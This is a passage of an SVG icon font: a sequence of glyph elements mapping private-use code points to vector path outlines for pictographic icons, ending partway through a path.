<glyph unicode="&#xe64a;" d="M908.199 948.418c-0.010 0-785.471 0.248-785.232 0-72.393 0-113.092-37.427-113.092-113.893v-788.323c0-71.534 36.578-108.98 108.932-108.98h791.653c72.335 0 108.97 35.586 108.97 108.98v788.323c0.010 74.606-36.626 113.893-111.232 113.893zM449.029 71.121c-32.79-0.677-157.779 60.906-154.154 353.682 3.435 277.921 121.373 331.825 153.801 335.46l0.162-198.211c-28.249 0-34.689-33.802-38.381-68.443-5.285-49.343-4.093-99.010 0-139.118 6.163-60.62 11.592-90.014 38.581-90.014v-193.355zM540.054 92.367c0-11.401-8.958-21.58-21.466-21.58l-0.105-0.048c-0.029-0.038-54.676 0.057-54.676 0.057v193.861h54.781c11.763 0 21.466-9.426 21.466-21.39 0-0.095 0.095-150.805 0.095-150.805l-0.095-0.095zM540.054 583.641c0-11.429-8.958-21.599-21.466-21.599l-0.105-0.029c-0.029-0.057-54.676 0.038-54.676 0.038v198.221h54.781c11.763 0 21.466-9.426 21.466-21.39 0-0.095 0.095-155.146 0.095-155.146l-0.095-0.095zM590.913 624.464l-13.939 13.586 0.372 0.544c11.382 11.382 11.382 29.833 0 41.215l13.738 13.729c18.947-19.138 18.89-50.011-0.172-69.073zM606.073 608.942c27.114 27.543 27.057 72.173 0.639 100.251l13.757 13.748c34.527-35.595 34.641-92.857-0.334-128.070l-14.063 14.072zM632.681 582.315c42.102 42.359 42.331 110.812 0.668 153.524l15.475 15.465c50.183-51.261 49.877-133.47-0.763-184.359l-15.379 15.37zM675.184 539.831v0l-13.118 13.252c58.33 58.578 59.093 153.725 1.212 212.665l13.337 13.337c65.533-66.592 64.55-173.015-1.431-239.254v0zM702.527 512.498l-13.318 13.433c73.308 73.566 73.557 192.506 0.696 266.425l13.795 13.805c80.254-81.313 79.586-212.665-1.173-293.663z" />
<glyph unicode="&#xe64b;" d="M645.186 679.743c-16.849 24.496-50.373 30.8-74.841 14.007-24.557-16.901-30.776-50.34-13.984-74.808 16.764-24.52 50.232-30.767 74.757-14.064 24.496 16.821 30.772 50.289 14.068 74.865zM568.090 581.872c0 0-43.689 46.103-54.479 57.443 0.714 13.707 2.428 49.213 2.428 49.213 0.578 12.744-9.357 23.669-22.162 24.247-12.772 0.634-23.674-9.221-24.247-22.044l-2.757-59.096c-0.324-6.304 1.954-12.523 6.28-17.065l19.954-21.081-59.918-39.551 3.227 45.249c-1.541 17.45-16.952 30.335-34.327 28.846 0 0-56.973-3.936-77.641-5.67-13.072-1.156-22.843-12.692-21.659-25.793 1.099-13.072 12.687-22.815 25.736-21.715 14.416 1.268 48.142 2.424 61.816 3.551 0 0-11.837-34.459-9.385-51.472 1.541-11.147 4.74-22.378 11.532-32.341 21.034-30.692 63.004-38.56 93.663-17.507 10.982 7.487 65.564 44.812 75.832 51.858 14.444 9.968 18.93 29.038 11.057 44.286-1.094 3.11-2.499 6.083-4.951 8.643zM700.533 377.325c-12.913 35.445 5.392 74.691 40.814 87.599l57.612-157.348h53.206v517.111h-677.31v-517.101h551.246l-25.567 69.74zM236.29 559.165l224.951 225.064c28.818-28.869 75.607-28.869 104.425 0l225.031-225.064c-153.083-153.055-401.319-153.055-554.407 0zM887.78 954.077h-748.567c-73.352 0-133.021-59.697-133.021-133.050v-748.478c0-73.38 59.674-133.078 133.021-133.078h748.567c73.348 0 133.050 59.697 133.050 133.078v748.478c0 73.352-59.702 133.050-133.050 133.050zM872.946 286.767h-66.273l10.921-30.194c12.058-32.975 4.796-68.204-15.938-93.527l39.222-113.316-165.883 0.028-19.818 59.979c-32.148 6.027-60.383 28.404-72.356 61.351l-42.177 115.684h-386.598v558.724h718.9v-558.728z" />
<glyph unicode="&#xe64c;" d="M902.59 948.499c-0.009 0-780.62 0.247-780.383 0-71.945 0-112.393-37.196-112.393-113.19v-783.455c0-71.092 36.352-108.307 108.26-108.307h786.764c71.889 0 108.297 35.366 108.297 108.307v783.455c0.009 74.145-36.399 113.19-110.545 113.19zM835.195 530.005v-43.036c0-11.055-8.941-19.996-19.996-19.996h-55.817c-11.055 0-19.996 8.941-19.996 19.996v43.036c0 11.036 8.941 19.996 19.996 19.996h55.817c11.055 0 19.996-8.96 19.996-19.996zM333.824 421.111c11.036 0 19.987-8.932 19.987-19.968v-43.036c0-11.055-8.951-19.996-19.987-19.996h-55.836c-11.036 0-19.996 8.941-19.996 19.996v43.036c0 11.036 8.96 19.968 19.996 19.968h55.836zM328.856 486.969v43.036c0 11.036 8.951 19.996 19.987 19.996h55.836c11.036 0 19.996-8.96 19.996-19.996v-43.036c0-11.055-8.96-19.996-19.996-19.996h-55.836c-11.036 0-19.987 8.941-19.987 19.996zM330.411 274.451c0 11.036 8.951 19.996 19.996 19.996h55.827c11.046 0 19.996-8.941 19.996-19.996v-43.036c0-11.036-8.951-19.996-19.996-19.996h-55.827c-11.046 0-19.996 8.96-19.996 19.996v43.036zM417.1 338.1c-11.036 0-19.987 8.941-19.987 19.996v43.036c0 11.036 8.951 19.968 19.987 19.968h55.836c11.036 0 19.996-8.932 19.996-19.968v-43.036c0-11.055-8.96-19.996-19.996-19.996h-55.836zM464.564 486.969v43.036c-0.009 11.036 8.941 19.996 19.977 19.996h55.846c11.036 0 19.987-8.96 19.987-19.996v-43.036c0-11.055-8.951-19.996-19.987-19.996h-55.846c-11.027 0-19.977 8.941-19.977 19.996zM466.129 274.451c-0.009 11.036 8.932 19.996 19.987 19.996h55.827c11.036 0 19.987-8.941 19.987-19.996v-43.036c0-11.036-8.951-19.996-19.987-19.996h-55.827c-11.055 0-19.987 8.96-19.987 19.996v43.036zM552.808 338.1c-11.036 0-19.987 8.941-19.987 19.996v43.036c-0.009 11.036 8.951 19.968 19.987 19.968h55.846c11.036 0 19.987-8.932 19.987-19.968v-43.036c0-11.055-8.951-19.996-19.987-19.996h-55.846zM603.345 486.969v43.036c0 11.036 8.96 19.996 19.996 19.996h55.836c11.036 0 19.996-8.96 19.996-19.996v-43.036c0-11.055-8.96-19.996-19.996-19.996h-55.836c-11.036 0-19.996 8.941-19.996 19.996zM604.919 274.451c0 11.036 8.941 19.996 19.977 19.996h55.836c11.036 0 19.996-8.941 19.996-19.996v-43.036c0-11.036-8.96-19.996-19.996-19.996h-55.836c-11.036 0-19.977 8.96-19.977 19.996v43.036zM691.598 338.1c-11.036 0-19.996 8.941-19.996 19.996v43.036c0 11.036 8.96 19.968 19.996 19.968h55.836c11.036 0 19.996-8.932 19.996-19.968v-43.036c0-11.055-8.96-19.996-19.996-19.996h-55.836zM812.98 605.241c0-10.306-8.249-18.792-18.735-18.792-0.076 0-135.908-0.095-135.908-0.095l-0.076 0.095c-10.003 0-18.906 7.851-18.906 18.792l-0.038 0.076c-0.038 0.038 0.038 47.91 0.038 47.91h173.625v-47.986zM519.14 801.185c243.447-2.996 290.664-106.297 293.831-134.703l-173.625-0.171c0 24.756-29.611 30.407-59.932 33.65-43.255 4.608-86.727 3.575-121.875 0-53.096-5.404-78.829-10.164-78.829-33.792h-169.368c-0.578 28.719 53.371 138.202 309.798 135.016zM209.057 653.208l169.813 0.019v-47.986c0-10.316-8.258-18.811-18.726-18.811-0.104 0-132.105-0.076-132.105-0.076l-0.095 0.076c-9.993 0-18.906 7.851-18.906 18.792l-0.028 0.095c-0.028 0.038 0.047 47.891 0.047 47.891zM189.734 530.005c0 11.036 8.96 19.996 19.996 19.996h55.836c11.036 0 19.987-8.96 19.987-19.996v-43.036c0-11.055-8.951-19.996-19.987-19.996h-55.836c-11.036 0-19.996 8.941-19.996 19.996v43.036zM191.298 231.415v43.036c0 11.036 8.951 19.996 19.987 19.996h55.836c11.036 0 19.996-8.941 19.996-19.996v-43.036c0-11.036-8.96-19.996-19.996-19.996h-55.836c-11.036 0-19.987 8.96-19.987 19.996zM765.212 110.763c0-11.055-8.941-19.987-19.977-19.987h-464.706c-11.036 0-19.996 8.932-19.996 19.987v42.344c0 11.055 8.96 19.987 19.996 19.987h464.706c11.036 0 19.977-8.932 19.977-19.987v-42.344zM836.75 231.415c0-11.036-8.941-19.996-19.996-19.996h-55.817c-11.055 0-19.996 8.96-19.996 19.996v43.036c0 11.036 8.941 19.996 19.996 19.996h55.817c11.055 0 19.996-8.941 19.996-19.996v-43.036z" />
<glyph unicode="&#xe64d;" d="M893.040 949.938h-757.699c-65.068 0-125.947-61.043-125.947-126.083v-757.479c0-65.040 61.15-126.41 126.19-126.41h757.451c65.096 0 126.331 61.047 126.331 126.055v757.779c0.005 65.040-61.23 126.139-126.326 126.139zM542.075 832.402c33.596 0 62.441-19.97 75.495-48.628h-47.053c-3.147 12.849-14.86 22.439-28.737 22.439-13.929 0-25.563-9.59-28.794-22.439h-46.407c13.055 28.658 41.933 48.628 75.495 48.628zM460.519 764.21h54.3c4.713-10.165 14.995-17.235 26.961-17.235 11.933 0 22.205 7.070 26.905 17.235h54.969c0.851-4.769 1.384-9.646 1.384-14.687 0-45.753-37.131-82.85-82.958-82.85-45.795 0-82.953 37.098-82.953 82.85-0.005 5.045 0.514 9.917 1.393 14.687zM124.554 633.442c-29.425 53.809-15.902 119.481 28.985 157.808l-14.92 27.288c-1.37 2.492-0.468 5.616 2.029 6.958l37.261 20.302c2.478 1.37 5.574 0.468 6.944-2.053l14.944-27.26c56.493 16.931 119.097-7.149 148.494-60.986l-72.204-39.426c11.933-21.836 3.862-49.26-18.016-61.234-21.92-11.919-49.316-3.862-61.286 17.974l-72.232-39.37zM347.276 276.73c0-41.343-33.582-74.85-74.972-74.85-41.409 0-74.972 33.507-74.972 74.85 0 41.315 33.563 74.822 74.972 74.822 41.395 0 74.972-33.507 74.972-74.822zM619.492 76.237h-423.15v75.341c0 13.864 11.231 25.118 25.109 25.118h398.041v-100.46zM619.492 201.88h-196.267c-34.213 0-62.053 27.774-62.053 62.001 0 34.274 27.835 62.001 62.053 62.001h196.267v-124.002zM601.99 393.055c-9.576 14.439-5.536 33.979 8.931 43.513l78.712 51.859-22.191 61.094h-30.683l18.025-49.563-59.766-39.37c-13.396-8.847-22.584-22.388-25.815-38.136-3.236-15.753-0.14-31.842 8.706-45.266 3.582-5.34 7.907-9.885 12.76-13.775h-82.706c4.849 3.89 9.207 8.435 12.746 13.775 8.861 13.424 11.956 29.514 8.692 45.266-3.208 15.748-12.396 29.285-25.81 38.136l-59.724 39.37 17.96 49.563h-30.659l-22.149-61.094 78.68-51.859c14.509-9.534 18.493-29.079 8.945-43.513s-29.069-18.432-43.522-8.87l-99.136 65.312c-17.165 11.671-15.524 29.097-12.372 36.85l42.157 120.056c8.15 22.631 23.884 40.301 68.206 40.301h194.672c44.345 0 60.056-17.67 68.234-40.301l42.171-120.056c3.137-7.752 4.755-25.179-12.396-36.85l-99.108-65.312c-14.49-9.562-33.984-5.569-43.56 8.87zM890.37 76.237h-243.015v251.207h243.015v-251.207z" />
<glyph unicode="&#xe64e;" d="M903.572 952.921c0 0-789.134 0.239-788.886 0-72.726 0-113.607-37.599-113.607-114.428v-792.006c0-71.858 36.759-109.495 109.428-109.495h795.345c72.669 0 109.495 35.748 109.495 109.495v792.006c-0.010 74.949-36.826 114.428-111.775 114.428zM874.845 712.999h-139.357v-141.246h-141.351v-143.24h-141.055v-142.495h-141.627v-143.698h-210.356v72.44h140.845v143.354h139.948v144.318h142.142v141.646h141.198v140.711h209.622v-71.792z" horiz-adv-x="1011" />
<glyph unicode="&#xe64f;" d="M710.229 519.431h-390.045v-278.73h390.045v278.73zM616.927 394.559h-83.841v-24.468h74.282c4.265 0 7.732-3.438 7.732-7.708s-3.467-7.713-7.732-7.713l-74.282-0.005v-24.468h71.426c2.973 0 7.342-2.668 7.342-7.295 0-41.669-5.223-61.294-27.164-61.294-22.768 0-27.446 49.293-51.604 52.543 0 0 0-36.934 0-47.174h-38.179c0 10.24 0 47.264 0 47.264-25.351-1.926-29.442-52.623-53.098-52.623-21.936 0-25.976 19.625-25.976 61.294 0 4.617 4.378 7.295 7.342 7.295h71.732v24.468h-74.263c-4.321 0-7.755 3.438-7.755 7.713 0 4.265 3.434 7.708 7.755 7.708h74.263v24.468h-83.588c-4.265 0-7.727 3.438-7.727 7.732 0 4.237 3.452 7.732 7.727 7.732h83.588v24.44h-78.458c-4.265 0-7.732 3.438-7.732 7.732 0 4.232 3.467 7.755 7.732 7.755h78.458v24.412h-61.459c-4.293 0-7.732 3.495-7.732 7.708 0 4.321 3.438 7.788 7.732 7.788h61.459v13.514h38.179v-13.514h61.463c4.265 0 7.732-3.467 7.732-7.788 0-4.209-3.462-7.708-7.732-7.708h-61.463v-24.412h78.693c4.293 0 7.755-3.523 7.755-7.755 0-4.293-3.462-7.732-7.755-7.732h-78.693v-24.44h83.841c4.265 0 7.732-3.495 7.732-7.732 0-4.298-3.467-7.736-7.732-7.736zM888.39 954.523h-748.553c-73.352 0-133.021-59.674-133.021-133.050v-748.478c0-73.38 59.674-133.078 133.021-133.078h748.553c73.352 0 133.050 59.697 133.050 133.078v748.478c0 73.38-59.697 133.050-133.050 133.050zM514.151 866.529c55.381 0 100.244-44.892 100.244-100.296 0-55.381-44.863-100.272-100.244-100.272-55.413 0-100.305 44.892-100.305 100.272 0 55.404 44.892 100.296 100.305 100.296zM400.609 641.442h230.381c41.669 0 78.275-22.241 98.586-55.404h-430.902c21.678 33.167 60.261 55.404 101.935 55.404zM359.983 140.673c0-21.466-17.361-38.813-38.837-38.813-21.387 0-38.78 17.338-38.78 38.813v33.858h77.613v-33.858zM643.457 48.466h-110.371l0.164 54.474h-36.981l-0.061-54.474h-110.587v126.065h257.837v-126.065zM707.063 101.865c-21.438 0-38.813 17.338-38.813 38.813v33.858h77.613v-33.858h0.005c0.005-21.471-17.389-38.813-38.804-38.813zM799.326 213.617h-570.396v333.335h570.396v-333.335z" />
<glyph unicode="&#xe650;" d="M888.79 955.030h-748.539c-73.348 0-133.017-59.674-133.017-133.050v-748.483c0-73.376 59.669-133.078 133.017-133.078h748.539c73.348 0 133.045 59.702 133.045 133.078v748.483c0 73.376-59.697 133.050-133.045 133.050zM495.874 789.335c41.007 0 74.202-33.134 74.202-74.038 0-40.899-33.195-74.066-74.202-74.066-40.983 0-74.198 33.167-74.207 74.066 0.005 40.899 33.224 74.038 74.207 74.038zM386.663 604.494c6.468 6.412 21.241 17.037 49.096 17.037h100.108c56.865 0 67.819-56.7 56.179-86.039l-52.356-126.967c-3.222-7.295-9.277-13.157-16.844-15.881l-114.679-42.224c-14.702-6.407-31.843 0.254-38.264 14.923-6.468 14.726 0.221 31.843 14.947 38.278l105.796 39.72 32.698 77.974-21.302 7.873-27.798-66.771-80.534-29.668v81.633l-78.721-85.983-89.093 0.089c0.005 0 155.897 170.886 160.768 176.006zM595.353 327.957h-100.498l-21.964 21.8 59.533 22.072c14.125 5.252 24.144 16.459 28.569 29.719 0.193 0.338 0.493 0.55 0.667 0.935l33.637 79.299 0.056-153.825zM143.421 237.455l253.788 20.395-49.161 74.404h-123.965c-20.255 0-36.714 15.82-36.714 36.056 0 20.203 16.459 36.502 36.714 36.502 0 0 121.762 0.188 126.027 0-9.55-12.997-10.348-30.805-4.622-46.766 9.714-25.708 41.2-39.828 67.072-30.579l34.872 12.852 50.091-48.912h207.797c35.121 0 63.352-28.348 63.352-63.234 0-34.76-27.982-62.859-62.859-63.136l-225.407 0.028c-14.947 0.305-26.943 12.438-26.943 27.413 0 15.196 12.307 27.498 27.498 27.498h116.515l94.861 19.818-5.12 24.524-92.329-19.287h-113.927c-28.982 0-52.548-23.561-52.548-52.548 0-10.076 2.997-19.404 7.929-27.413l-284.724 0.033c-20.203 0-36.577 16.436-36.577 36.69 0.005 17.385 12.142 31.918 28.381 35.662zM883.754 77.326c0 0-718.505 0-740.718 0-29.090 0-27.578 28.324-27.578 28.324v21.8c0 0-1.705 13.101 14.947 13.101 14.721 0 591.576 0 591.576 0 47.142 0 67.598 43.9 92.338 43.9h72.187c22.462 0 24.942-19.094 24.942-19.094v-60.364c-0.005 0 1.588-27.667-27.695-27.667zM846.35 207.623c-36.902 0-66.847 29.889-66.847 66.687 0 36.939 29.945 66.72 66.847 66.715 36.883 0 66.908-29.781 66.908-66.715 0-36.798-30.025-66.687-66.908-66.687z" horiz-adv-x="1029" />
<glyph unicode="&#xe651;" d="M584.587 812.953h18.963v-90.662h-18.963v90.662zM653.862 640.023h-279.998v-385.329h279.998v385.329zM585.329 284.695v-0.009l-29.494 53.69-29.574-53.69h-27.488l43.388 78.58-52.323 95.279c-2.724-0.221-5.181-0.662-8.065-0.662h-34.459v-101.644h-39.302v246.009h77.974c47.118 0 67.819-29.616 67.819-71.642 0-27.634-10.127-49.185-29.043-61.431l37.747-69.059 28.724 52.036h27.277l-42.379-76.932 49.486-90.525h-40.288zM472.538 572.637h-25.215v-85.1h27.911c21.053 0 39.302 11.367 39.302 42.383 0 26.507-10.658 42.717-41.998 42.717zM626.97 812.953h18.859v-90.662h-18.859v90.662zM669.25 812.953h18.935v-90.662h-18.935v90.662zM888.715 950.986h-748.582c-73.352 0-133.021-59.669-133.021-133.050v-748.478c0-73.376 59.674-133.078 133.021-133.078h748.582c73.348 0 133.012 59.702 133.012 133.078v748.478c0.005 73.38-59.664 133.050-133.012 133.050zM688.213 83.658c0-14.388-11.973-26.14-26.864-26.14h-295.194c-14.862 0-26.915 11.753-26.915 26.14v595.118h348.973v-595.118zM719.285 717.833c0-7.595-6.247-13.707-14.035-13.707h-383.103c-7.732 0-14.064 6.111-14.064 13.707v99.305c0 7.567 6.337 13.655 14.064 13.655h383.103c7.788 0 14.035-6.083 14.035-13.655v-99.305z" horiz-adv-x="1029" />
<glyph unicode="&#xe652;" d="M482.351 582.6c-13.406 0-20.668 13.622-20.724 13.763-3.081 5.89-10.348 8.173-16.21 5.092-5.834-3.030-8.173-10.24-5.181-16.13 0.521-1.047 13.815-26.812 42.116-26.812 11.086 0 20.306 2.367 27.709 6.853 7.074-4.871 16.21-7.516 27.413-7.516 25.905 0 38.118 26.948 38.649 28.104 0.686 1.569 1.047 3.194 1.047 4.815 0 4.622-2.696 9.028-7.13 10.982-2.917 1.32-6.191 1.461-9.193 0.301-3.006-1.099-5.392-3.415-6.722-6.36-0.028-0.108-6.468-13.791-16.652-13.791-9 0-12.993 2.283-14.67 3.744 0 2.475 0 15.219 0 20.339 8.065 1.541 14.374 8.699 14.374 17.366 0 10.019-8.122 18.521-17.676 18.521l-16.755-0.136c-10.127 0-18.357-8.286-18.357-18.385 0-8.699 6.111-16.074 14.341-17.943 0-4.843 0-16.13 0-18.935-2.151-1.559-6.943-3.871-16.379-3.871zM449.785 654.078c10.898 0 19.766 8.807 19.766 19.766 0 10.869-8.864 19.733-19.766 19.733s-19.761-8.864-19.761-19.733c0-10.959 8.864-19.766 19.761-19.766zM570.697 654.078c10.926 0 19.79 8.807 19.79 19.766 0 10.869-8.864 19.733-19.79 19.733-10.869 0-19.733-8.864-19.733-19.733 0-10.959 8.864-19.766 19.733-19.766zM884.356 954.251h-748.558c-73.352 0-133.021-59.674-133.021-133.050v-748.478c0-73.38 59.674-133.078 133.021-133.078h748.558c73.343 0 133.017 59.697 133.017 133.078v748.478c0.005 73.38-59.669 133.050-133.017 133.050zM365.070 839.121c60.942 2.973 72.634-42.139 72.634-42.139s28.273 17.286 72.417 17.286c44.126 0 72.356-17.286 72.356-17.286s11.724 45.112 72.666 42.139c35.511-1.705 64.489-31.378 64.489-66.936 0-33.303-21.908-78.002-57.64-79.13l-4.542-0.136c1.019-6.055 1.404-22.927 1.404-27.385 0-82.047-66.748-148.846-148.738-148.846-82.019 0-148.767 66.8-148.767 148.846 0 4.458 0.357 21.33 1.437 27.385l-4.599 0.136c-35.699 1.127-57.579 45.826-57.579 79.13 0 35.558 28.954 65.231 64.46 66.936zM429.507 322.828v0 58.936h52.102v52.097h58.871v-52.102h52.158v-58.936h-52.158v-52.102h-58.871v52.102h-52.102zM239.921 330.019c-2.64 66.358 32.754 121.433 67.683 166.569l4.81 6.412c11.452 15.524 18.991 25.788 53.835 23.369 26.676-1.898 53.619-21.8 53.619-56.259 0-0.085 0-0.164 0-0.277-0.103-20.724-13.65-39.33-27.963-58.95-17.422-23.862-37.155-50.866-37.155-87.608 0-10.512 2.306-18.667 4.57-26.45 2.175-7.685 4.237-14.895 4.237-24.191 0-31.65-26.751-57.419-59.613-57.419-39.476-0.005-60.998 38.644-64.023 114.805zM413.564 54.643c-43.628 0-79.13 35.45-79.13 79.073s35.506 79.073 79.13 79.073c43.595 0 79.073-35.45 79.073-79.073s-35.474-79.073-79.073-79.073zM607.993 54.643c-43.619 0-79.13 35.45-79.13 79.073s35.511 79.073 79.13 79.073c43.628 0 79.139-35.45 79.139-79.073s-35.511-79.073-79.139-79.073zM780.293 330.019c-3.053-76.161-24.604-114.805-64.052-114.805-32.862 0-59.613 25.76-59.613 57.419 0 9.296 2.057 16.516 4.237 24.191 2.278 7.783 4.57 15.938 4.57 26.45 0 36.742-19.705 63.746-37.132 87.608-14.341 19.653-27.855 38.226-27.963 58.95 0 0.108 0 0.193 0 0.277 0 34.459 26.915 54.361 53.619 56.259 34.788 2.424 42.364-7.844 53.807-23.369l4.843-6.412c34.938-45.141 70.243-100.211 67.683-166.569z" horiz-adv-x="1019" />
<glyph unicode="&#xe653;" d="M305.821 794.033c-17.357 0-31.445-14.027-31.445-31.454 0-17.343 14.088-31.487 31.445-31.487 17.371 0 31.44 14.144 31.44 31.487 0 17.427-14.069 31.454-31.44 31.454zM357.998 630.627c-16.566 0-29.916-13.368-29.916-29.869 0-16.524 13.354-29.892 29.916-29.892 16.463 0 29.836 13.368 29.836 29.892 0 16.501-13.373 29.869-29.836 29.869zM248.753 611.368c-16.482 0-29.864-13.377-29.864-29.925 0-16.496 13.387-29.864 29.864-29.864 16.463 0 29.836 13.368 29.836 29.864 0 16.548-13.373 29.925-29.836 29.925zM364.329 718.439c-16.496 0-29.864-13.373-29.864-29.892 0-16.496 13.368-29.892 29.864-29.892 16.52 0 29.902 13.396 29.906 29.892 0 16.524-13.387 29.892-29.906 29.892zM881.678 949.9h-745.145c-73.013 0-132.409-59.397-132.409-132.447v-745.075c0-73.045 59.397-132.451 132.409-132.451h745.145c73.008 0 132.405 59.406 132.405 132.451v745.075c0.005 73.050-59.392 132.447-132.405 132.447zM110.709 662.979c0 100.965 82.191 183.165 183.198 183.165 100.974 0 183.137-82.196 183.137-183.165 0-101.021-82.163-183.193-183.137-183.193-101.007 0-183.198 82.172-183.198 183.193zM409.413 332.985l182.188-105.177-18.025-31.262-182.216 105.205 18.053 31.234zM862.072 61.854h-448.021v74.766c0 0 86.301 0 159.174 0 108.904 0 197.506 88.55 197.506 197.454 0 68.912-35.672 131.105-91.426 166.585l-90.823-157.35-18.848 10.904-26.792-46.328-47.394 27.344 26.788 46.384-18.904 10.918 215.994 374.181 14.574-8.384 21.724 37.589 56.792-32.796-21.724-37.621 13.808-8-87.835-152.118c78.441-48.656 128.856-135.233 128.856-231.302 0-77.918-33.315-147.774-86.007-197.454 36.247 0 102.55 0 102.559-0.005v-74.766zM284.892 677.699c-16.492 0-29.892-13.396-29.892-29.892s13.401-29.864 29.892-29.864c16.463 0 29.836 13.368 29.836 29.864s-13.373 29.892-29.836 29.892zM246.948 723.204h-60.248v-60.687h60.248v60.687zM234.248 675.038c-8 0-27.124 0-35.167 0 0 8.080 0 27.587 0 35.672 8.042 0 27.166 0 35.167 0 0-8.084 0-27.587 0-35.672zM293.897 829.218c-91.646 0-166.262-74.612-166.262-166.234 0-91.65 74.616-166.234 166.267-166.234 91.604 0 166.206 74.579 166.206 166.234 0 91.622-74.602 166.234-166.211 166.234zM294.056 518.754c-79.507 0-144.174 64.629-144.174 144.117 0 79.512 64.671 144.225 144.174 144.225 79.465 0 144.122-64.713 144.122-144.225 0-79.489-64.657-144.117-144.122-144.117z" horiz-adv-x="1015" />
<glyph unicode="&#xe654;" d="M885.97 949.582h-745.117c-73.013 0-132.409-59.397-132.409-132.437v-745.042c0-73.041 59.397-132.465 132.409-132.465h745.117c73.013 0 132.437 59.425 132.437 132.465v745.042c0.005 73.041-59.42 132.437-132.437 132.437zM453.342 786.841c2.96 37.121 35.452 64.849 72.55 61.917 37.074-2.927 64.849-35.424 61.973-72.573-2.955-37.093-35.475-64.793-72.573-61.889-37.177 2.96-64.849 35.396-61.95 72.545zM776.164 439.859c-1.342-16.767-16.029-29.261-32.74-27.891-5.157 0.355-9.071 2.3-13.892 4.526 0 0-86.409 58.817-91.505 62.871-8.688 7.037-17.179 15.86-20.938 28.162-1.309 4.302-18.843 63.89-18.843 63.89l-11.788-150.579 74.027-119.995c3.568-5.728 5.756-12.246 6.331-19.012l16.931-190.52c2.137-23.945-15.589-45.206-39.534-47.254-23.917-2.057-45.070 15.477-47.258 39.534 0 0-14.383 161.89-15.944 180.247-6.794 11.040-46.767 69.534-66.85 102.166l-102.984-291.924c-7.528-22.846-32.244-35.34-55.039-27.723-22.766 7.593-35.232 32.076-27.699 55.039l89.556 258.801 17.020 111.911h-57.699c-25.184 0-45.589 20.41-45.589 45.589 0 5.966 1.15 11.671 3.226 16.889 0 0 47.212 105.481 56.11 122.74 13.125 25.642 35.999 36.948 68.547 36.046h84.768l-177.891-127.425-15.973-37.28c-1.37-3.385-2.137-7.084-2.137-10.974 0-15.982 12.961-28.934 28.934-28.934h147.727c25.179 0 45.589 20.41 45.589 45.589 0 22.233-15.809 40.815-36.85 44.761l43.008 114.263h10.193c23.669 0 42.377-15.973 47.918-34.549l34.082-122.74c0.575-1.973 2.824-5.728 5.672-7.893 3.507-2.572 89.616-61.697 89.616-61.697 7.925-6.111 12.723-15.893 11.9-26.633zM528.146 562.964c14.49-1.566 25.834-13.705 25.834-28.616 0-15.982-12.961-28.934-28.934-28.934l-18.025-0.178 21.125 57.727z" />
<glyph unicode="&#xe655;" d="M598.376 536.765c-23.089 23.070-53.781 35.751-86.385 35.751-32.632 0-63.315-12.685-86.381-35.751-23.019-23.122-35.732-53.762-35.732-86.39 0-67.322 54.74-122.141 122.108-122.141 32.604 0 63.287 12.718 86.385 35.751 23.075 23.070 35.751 53.758 35.751 86.39 0.005 32.632-12.681 63.268-35.746 86.39zM469.633 443.502c-22.304 0-40.357 18.053-40.357 40.357 0 22.308 18.053 40.39 40.357 40.39 22.276 0 40.357-18.081 40.357-40.39 0-22.304-18.081-40.357-40.357-40.357zM604.347 625.699c62.819-33.151 105.832-99.094 105.832-174.94 0-52.851-20.63-102.554-57.966-139.923-15.014-14.986-32.001-27.12-50.433-36.467 108.044 22.659 204.178 84.604 270.069 175.899-65.349 90.608-160.52 152.361-267.502 175.431zM314.433 450.759c0 52.827 20.602 102.526 58.027 139.895 14.925 14.906 31.945 27.096 50.326 36.382-109.914-21.808-207.937-84.136-274.787-176.773 67.509-93.511 166.818-156.139 277.995-177.372-19.564 9.511-37.673 22.135-53.529 37.944-37.43 37.369-58.031 87.073-58.031 139.923zM882.473 951.013h-745.159c-73.013 0-132.405-59.429-132.405-132.451v-745.075c0-73.050 59.397-132.447 132.405-132.447h745.159c73.008 0 132.4 59.397 132.4 132.447v745.075c0.005 73.022-59.387 132.451-132.4 132.451zM916.803 443.231c-90.631-137.408-242.735-219.407-406.841-219.407-164.158 0-316.299 81.999-406.949 219.351l-4.685 7.098 4.685 7.098c90.739 137.352 242.842 219.356 406.949 219.356s316.21-82.009 406.841-219.356l4.685-7.098-4.685-7.042z" horiz-adv-x="1019" />
<glyph unicode="&#xe656;" d="M891.932 955.649h-752.027c-73.657 0-133.601-59.954-133.601-133.644v-751.97c0-73.723 59.944-133.667 133.601-133.667h752.027c73.686 0 133.653 59.944 133.653 133.667v751.97c0 73.695-59.968 133.644-133.653 133.644zM734.472 303.625v-257.68h-323.933v92.939h-47.581c-66.079 0-119.695 53.583-119.695 119.756v84.85h-40.7c-13.52 0-24.552 11.004-24.552 24.477 0 3.407 0.609 6.63 1.826 9.518l63.427 159.716c0 0 6.559 66.164 12.524 91.495 26.407 113.957 153.454 217.366 291.198 217.366 167.582 0 303.5-135.932 303.5-303.666 0-96.865-45.372-183.192-116.014-238.771zM738.068 736.348l-37.185-26.19c-5.531 3.237-11.363 6.144-17.592 8.442-1.741 0.637-3.478 1.104-5.219 1.633l-8.107 46.424h-44.707l-7.55-44.712c-8.159-2.1-15.988-5.172-23.42-9.046l-38.459 27.186-31.716-31.64 26.35-37.024c-3.289-5.587-6.191-11.476-8.489-17.752-0.67-1.741-1.104-3.483-1.666-5.224l-38.379-6.583v21.32l-29.309 5.030c-1.326 5.115-3.317 9.98-5.748 14.652l17.97 25.383-20.763 20.716-24.444-17.233c-3.567 2.072-7.244 4.016-11.255 5.507-1.024 0.387-2.1 0.472-3.152 0.802l-5.309 30.578h-29.177l-5.111-29.337c-5.144-1.354-10.037-3.374-14.737-5.814l-25.44 17.894-20.655-20.716 17.281-24.444c-2.072-3.539-4.016-7.215-5.474-11.226-0.387-1.052-0.637-2.1-0.967-3.181l-30.413-5.224v-29.337l29.507-5.059c1.35-5.040 3.209-9.933 5.587-14.577l-17.946-25.411 20.683-20.74 24.524 17.281c3.567-2.1 7.272-4.035 11.283-5.531 1.024-0.387 2.1-0.472 3.124-0.831l5.309-30.578 29.167 0.028 5.115 29.309c5.115 1.354 9.98 3.346 14.68 5.781l25.326-17.861 20.758 20.711-17.252 24.444c2.072 3.539 3.987 7.187 5.446 11.17 0.415 1.052 0.495 2.157 0.859 3.237l22.509 3.879v-36.699l44.683-7.687c2.1-8.159 5.177-15.983 9.070-23.42l-27.124-38.379 31.527-31.612 37.161 26.19c5.559-3.237 11.358-6.111 17.606-8.404 1.741-0.665 3.483-1.104 5.224-1.661l8.102-46.458h38.789l-3.209-18.607c-5.606-1.274-10.896-3.483-15.865-6.276l-18.555 